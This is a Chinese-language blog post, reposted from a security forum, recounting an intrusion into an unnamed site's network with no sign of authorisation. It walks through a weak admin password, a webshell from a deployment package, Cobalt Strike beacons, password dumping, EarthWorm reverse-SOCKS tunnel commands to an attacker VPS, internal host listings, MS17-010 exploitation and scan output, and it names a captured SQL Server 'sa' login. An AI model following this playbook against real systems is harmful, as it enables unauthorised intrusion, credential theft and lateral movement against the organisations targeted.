某站点的测试 - newlifes

admin 2021年12月31日15:47:12先知文章评论24 views1497字阅读4分59秒阅读模式

站点信息

弱口令yyds
后台登录通过部署包getshell
各位看shell应该就知道是什么应用了

通过信息收集发现

外网 x.x.x.x
内网 192.168.10.36
system权限 3389开启
没有waf

直接掏出cs

可以正常上线,并且成功读取密码

上传代理,进内网看看

E:\ew_for_Win.exe -s rssocks -d vps -e 33333

./ew_for_linux64 -s rcsocks -l 22222 -e 33333 &

登录远程桌面(没必要)

某站点的测试 -  newlifes
全是外语,看不懂,操作不了,只能从shell里执行命令

某站点的测试 -  newlifes
通过发现还有不少内网ip

192.168.10.11   RSGROUP\BCSERVER101             SHARING
192.168.10.12   WORKGROUP\BCSERVER102           SHARING
192.168.10.14   WORKGROUP\BCSERVER104           SHARING
192.168.10.20   WORKGROUP\BROADCAST             SHARING
192.168.10.25   RSGROUP\TOOLBOX1                SHARING
192.168.10.32   -no name-                      
192.168.10.33   -no name-                      
192.168.10.34   WORKGROUP\DESKTOP-Q1RM2EN       SHARING
192.168.10.35   WORKGROUP\IMOTION-DB            SHARING
192.168.10.36   WORKGROUP\NRCS-MAIN             SHARING
192.168.10.37   WORKGROUP\NRCS-BACKUP           SHARING
192.168.10.162  RSGROUP\BCSEVER162              SHARING
192.168.10.203  RSGROUP\RSFEED03                SHARING
192.168.11.203  RSGROUP\RSFEED02                SHARING

某站点的测试 -  newlifes
通过192.168.10.36 这台机器可以发现
192.168.10.37
172.x.x.x
这几台机器,感觉内网不应该才这么点机器
先打一波ms17_010

通过ms17_010搞定一台 192.168.10.202

某站点的测试 -  newlifes
成功登录这台机器,并把抓到的密码记录下来,准备碰撞一波
某站点的测试 -  newlifes
通过cs搞定192.168.10.37

某站点的测试 -  newlifes
通过cs 上线192.168.10.202这台机器,才能发现更多内网设备
192.168.10.36这台机器双网卡,与内网很多机器不互通
192.168.10.202 不出网,与内网多个网段互通
某站点的测试 -  newlifes
通过对172的设备扫描发现2台存在漏洞的机器,但是payload打过去失败

[+] 172.23.3.100:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 172.23.3.1/24:445     - Scanned 103 of 256 hosts (40% complete)
[+] 172.23.3.122:445      - Host is likely VULNERABLE to MS17-010! - Windows Server (R) 2008 Enterprise 6002 Service Pack 2 x64 (64-bit)

/*
   6 ธันวาคม 255917:31:51
   User: sa
   Server: RSFEED03
   Database: BEAsset
   Application: 
*/

对着内网的机器一顿扫,没发现能利用的漏洞
回过头来看看内网有什么其他的web服务

某站点的测试 -  newlifes
没发现能利用的漏洞,倒是发现了一个网管系统,可以看到网络结构
某站点的测试 -  newlifes
没发现值得利用的漏洞,暂时只能拿到3台机器

BY:先知论坛

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月31日15:47:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  某站点的测试 - newlifes https://cn-sec.com/archives/712555.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: